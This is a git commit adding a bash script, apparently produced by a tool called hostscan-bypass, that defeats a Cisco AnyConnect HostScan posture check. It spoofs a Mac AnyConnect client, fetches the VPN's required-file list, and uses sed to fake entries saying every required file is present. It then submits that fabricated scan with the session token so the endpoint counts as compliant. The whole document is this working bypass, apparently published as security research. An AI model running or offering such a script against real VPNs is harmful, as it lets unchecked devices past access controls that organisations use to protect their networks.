Initial commit

2020-12-17 20:22:15 +02:00
commit 2c734c7d28
4 changed files with 103 additions and 0 deletions
@@ -0,0 +1,40 @@
+#!/bin/bash
+# Initially generated by hostscan-bypass.go
+#
+# Github repo: https://github.com/Gilks/hostscan-bypass
+# Blog post: https://gilks.github.io/post/cisco-hostscan-bypass
+#
+# You can find a list of hostscan requirements here:
+# https://<VPN Page>/CACHE/sdesktop/data.xml
+function run_curl
+{
+    curl \
+        --insecure \
+        --user-agent "$useragent" \
+        --header "X-Transcend-Version: 1" \
+        --header "X-Aggregate-Auth: 1" \
+        --header "X-AnyConnect-Platform: $plat" \
+        --cookie "sdesktop=$token" \
+        --header "Accept: */*" \
+        --header "Accept-Encoding: identity" \
+        --header "Content-Type: text/xml" \
+        "$@"
+}
+set -e
+host=https://$CSD_HOSTNAME
+
+plat="mac-intel"
+useragent="AnyConnect Darwin_i386 4.9.03047"
+token=$CSD_TOKEN
+
+payload=$(curl --insecure --user-agent "$useragent" \
+  "$host/CACHE/sdesktop/data.xml" | \
+  sed -n 's/.*File.,.\(.*\).,.\(.*\)[\/\\]\(.*\).".*/endpoint.file["\1"]={};\
+endpoint.file["\1"].exists="true";\
+endpoint.file["\1"].path="\2\3";\
+endpoint.file["\1"].name="\3";\
+/p')
+
+run_curl --data-binary "$payload" "$host/+CSCOE+/sdesktop/scan.xml?reusebrowser=1"
+exit 0
+